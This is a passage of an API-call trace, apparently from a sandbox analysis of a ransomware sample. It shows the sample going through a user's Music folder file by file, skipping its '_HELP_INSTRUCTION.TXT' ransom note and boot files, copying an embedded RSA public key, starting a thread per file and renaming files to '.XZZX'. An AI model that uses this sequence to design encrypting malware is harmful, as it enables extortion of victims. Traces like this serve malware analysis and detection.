MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0184.086] lstrcpyW (in: lpString1=0x17cf1c, lpString2="5EF7279E2ED18E2582C79CC632E9726D.XZZX" | out: lpString1="5EF7279E2ED18E2582C79CC632E9726D.XZZX") returned="5EF7279E2ED18E2582C79CC632E9726D.XZZX" [0184.086] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0184.086] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xbcc [0184.086] Sleep (dwMilliseconds=0x96) [0184.241] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0184.241] lstrcmpW (lpString1="70CB960A1797B0A14EB31B321C2694E9.XZZX", lpString2="..") returned 1 [0184.241] lstrcmpW (lpString1="70CB960A1797B0A14EB31B321C2694E9.XZZX", lpString2=".") returned 1 [0184.241] StrStrW (lpFirst="70CB960A1797B0A14EB31B321C2694E9.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0184.241] StrStrW (lpFirst="70CB960A1797B0A14EB31B321C2694E9.XZZX", lpSrch="ntldr") returned 0x0 [0184.241] StrStrW (lpFirst="70CB960A1797B0A14EB31B321C2694E9.XZZX", lpSrch="NTLDR") returned 0x0 [0184.241] StrStrW (lpFirst="70CB960A1797B0A14EB31B321C2694E9.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0184.241] StrStrW (lpFirst="70CB960A1797B0A14EB31B321C2694E9.XZZX", lpSrch="ntdetect.com") returned 0x0 [0184.241] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned 40 [0184.241] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") [0184.242] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0184.242] lstrcpyW (in: lpString1=0x17cf1c, lpString2="70CB960A1797B0A14EB31B321C2694E9.XZZX" | out: lpString1="70CB960A1797B0A14EB31B321C2694E9.XZZX") returned="70CB960A1797B0A14EB31B321C2694E9.XZZX" [0184.242] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0184.242] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xbd0 [0184.242] Sleep (dwMilliseconds=0x96) [0184.397] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0184.397] lstrcmpW (lpString1="95567F6E0CF2434A8F3CB62A111F2792.XZZX", lpString2="..") returned 1 [0184.397] lstrcmpW (lpString1="95567F6E0CF2434A8F3CB62A111F2792.XZZX", lpString2=".") returned 1 [0184.397] StrStrW (lpFirst="95567F6E0CF2434A8F3CB62A111F2792.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0184.397] StrStrW (lpFirst="95567F6E0CF2434A8F3CB62A111F2792.XZZX", lpSrch="ntldr") returned 0x0 [0184.397] StrStrW (lpFirst="95567F6E0CF2434A8F3CB62A111F2792.XZZX", lpSrch="NTLDR") returned 0x0 [0184.398] StrStrW (lpFirst="95567F6E0CF2434A8F3CB62A111F2792.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0184.398] StrStrW (lpFirst="95567F6E0CF2434A8F3CB62A111F2792.XZZX", lpSrch="ntdetect.com") returned 0x0 [0184.398] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned 40 [0184.398] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") [0184.398] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0184.398] lstrcpyW (in: lpString1=0x17cf1c, lpString2="95567F6E0CF2434A8F3CB62A111F2792.XZZX" | out: lpString1="95567F6E0CF2434A8F3CB62A111F2792.XZZX") returned="95567F6E0CF2434A8F3CB62A111F2792.XZZX" [0184.398] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0184.398] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xbd4 [0184.399] Sleep (dwMilliseconds=0x96) [0184.554] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0184.554] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0184.554] lstrcmpW (lpString1="B169CAD546C877A0159FDF7F4B675BE8.XZZX", lpString2="..") returned 1 [0184.554] lstrcmpW (lpString1="B169CAD546C877A0159FDF7F4B675BE8.XZZX", lpString2=".") returned 1 [0184.554] StrStrW (lpFirst="B169CAD546C877A0159FDF7F4B675BE8.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0184.554] StrStrW (lpFirst="B169CAD546C877A0159FDF7F4B675BE8.XZZX", lpSrch="ntldr") returned 0x0 [0184.554] StrStrW (lpFirst="B169CAD546C877A0159FDF7F4B675BE8.XZZX", lpSrch="NTLDR") returned 0x0 [0184.554] StrStrW (lpFirst="B169CAD546C877A0159FDF7F4B675BE8.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0184.554] StrStrW (lpFirst="B169CAD546C877A0159FDF7F4B675BE8.XZZX", lpSrch="ntdetect.com") returned 0x0 [0184.554] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned 40 [0184.554] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") [0184.554] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0184.554] lstrcpyW (in: lpString1=0x17cf1c, lpString2="B169CAD546C877A0159FDF7F4B675BE8.XZZX" | out: lpString1="B169CAD546C877A0159FDF7F4B675BE8.XZZX") returned="B169CAD546C877A0159FDF7F4B675BE8.XZZX" [0184.554] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0184.554] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xbd8 [0184.555] Sleep (dwMilliseconds=0x96) [0184.710] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0184.710] lstrcmpW (lpString1="C1C4370F268A7D85910C485D2AAB61CD.XZZX", lpString2="..") returned 1 [0184.710] lstrcmpW (lpString1="C1C4370F268A7D85910C485D2AAB61CD.XZZX", lpString2=".") returned 1 [0184.710] StrStrW (lpFirst="C1C4370F268A7D85910C485D2AAB61CD.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0184.710] StrStrW (lpFirst="C1C4370F268A7D85910C485D2AAB61CD.XZZX", lpSrch="ntldr") returned 0x0 [0184.710] StrStrW (lpFirst="C1C4370F268A7D85910C485D2AAB61CD.XZZX", lpSrch="NTLDR") returned 0x0 [0184.710] StrStrW (lpFirst="C1C4370F268A7D85910C485D2AAB61CD.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0184.710] StrStrW (lpFirst="C1C4370F268A7D85910C485D2AAB61CD.XZZX", lpSrch="ntdetect.com") returned 0x0 [0184.710] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned 40 [0184.710] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") [0184.710] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0184.710] lstrcpyW (in: lpString1=0x17cf1c, lpString2="C1C4370F268A7D85910C485D2AAB61CD.XZZX" | out: lpString1="C1C4370F268A7D85910C485D2AAB61CD.XZZX") returned="C1C4370F268A7D85910C485D2AAB61CD.XZZX" [0184.710] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0184.711] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xbdc [0184.711] Sleep (dwMilliseconds=0x96) [0184.865] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0184.865] lstrcmpW (lpString1="D25EF7C41A27D9E43EBB395A1EBABE2C.XZZX", lpString2="..") returned 1 [0184.865] lstrcmpW (lpString1="D25EF7C41A27D9E43EBB395A1EBABE2C.XZZX", lpString2=".") returned 1 [0184.865] StrStrW (lpFirst="D25EF7C41A27D9E43EBB395A1EBABE2C.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0184.865] StrStrW (lpFirst="D25EF7C41A27D9E43EBB395A1EBABE2C.XZZX", lpSrch="ntldr") returned 0x0 [0184.866] StrStrW (lpFirst="D25EF7C41A27D9E43EBB395A1EBABE2C.XZZX", lpSrch="NTLDR") returned 0x0 [0184.866] StrStrW (lpFirst="D25EF7C41A27D9E43EBB395A1EBABE2C.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0184.866] StrStrW (lpFirst="D25EF7C41A27D9E43EBB395A1EBABE2C.XZZX", lpSrch="ntdetect.com") returned 0x0 [0184.866] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned 40 [0184.866] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") [0184.866] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0184.866] lstrcpyW (in: lpString1=0x17cf1c, lpString2="D25EF7C41A27D9E43EBB395A1EBABE2C.XZZX" | out: lpString1="D25EF7C41A27D9E43EBB395A1EBABE2C.XZZX") returned="D25EF7C41A27D9E43EBB395A1EBABE2C.XZZX" [0184.866] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0184.866] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xbe0 [0184.866] WaitForSingleObject (hHandle=0xbe0, dwMilliseconds=0xffffffff) returned 0x0 [0184.868] Sleep (dwMilliseconds=0x96) [0185.021] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0185.021] lstrcmpW (lpString1="FAD3BB6308C4FC66694F337D0D31E0AE.XZZX", lpString2="..") returned 1 [0185.021] lstrcmpW (lpString1="FAD3BB6308C4FC66694F337D0D31E0AE.XZZX", lpString2=".") returned 1 [0185.021] StrStrW (lpFirst="FAD3BB6308C4FC66694F337D0D31E0AE.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0185.021] StrStrW (lpFirst="FAD3BB6308C4FC66694F337D0D31E0AE.XZZX", lpSrch="ntldr") returned 0x0 [0185.021] StrStrW (lpFirst="FAD3BB6308C4FC66694F337D0D31E0AE.XZZX", lpSrch="NTLDR") returned 0x0 [0185.021] StrStrW (lpFirst="FAD3BB6308C4FC66694F337D0D31E0AE.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0185.021] StrStrW (lpFirst="FAD3BB6308C4FC66694F337D0D31E0AE.XZZX", lpSrch="ntdetect.com") returned 0x0 [0185.021] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned 40 [0185.021] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") [0185.022] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0185.022] lstrcpyW (in: lpString1=0x17cf1c, lpString2="FAD3BB6308C4FC66694F337D0D31E0AE.XZZX" | out: lpString1="FAD3BB6308C4FC66694F337D0D31E0AE.XZZX") returned="FAD3BB6308C4FC66694F337D0D31E0AE.XZZX" [0185.022] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0185.022] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xbe4 [0185.022] Sleep (dwMilliseconds=0x96) [0185.177] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0185.177] lstrcmpW (lpString1="FCD862501902E584E01CEFE81DABC9CC.XZZX", lpString2="..") returned 1 [0185.177] lstrcmpW (lpString1="FCD862501902E584E01CEFE81DABC9CC.XZZX", lpString2=".") returned 1 [0185.177] StrStrW (lpFirst="FCD862501902E584E01CEFE81DABC9CC.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0185.177] StrStrW (lpFirst="FCD862501902E584E01CEFE81DABC9CC.XZZX", lpSrch="ntldr") returned 0x0 [0185.177] StrStrW (lpFirst="FCD862501902E584E01CEFE81DABC9CC.XZZX", lpSrch="NTLDR") returned 0x0 [0185.177] StrStrW (lpFirst="FCD862501902E584E01CEFE81DABC9CC.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0185.177] StrStrW (lpFirst="FCD862501902E584E01CEFE81DABC9CC.XZZX", lpSrch="ntdetect.com") returned 0x0 [0185.177] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned 40 [0185.177] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") [0185.178] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0185.178] lstrcpyW (in: lpString1=0x17cf1c, lpString2="FCD862501902E584E01CEFE81DABC9CC.XZZX" | out: lpString1="FCD862501902E584E01CEFE81DABC9CC.XZZX") returned="FCD862501902E584E01CEFE81DABC9CC.XZZX" [0185.178] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0185.178] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xbe8 [0185.178] Sleep (dwMilliseconds=0x96) [0185.333] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0185.333] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0185.333] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0185.333] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0185.333] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0185.333] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 1 [0185.334] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 0 [0185.334] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music" [0185.334] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*.*" [0185.334] SetErrorMode (uMode=0x1) returned 0x1 [0185.334] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_HELP_INSTRUCTION.TXT") returned 57 [0185.334] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: 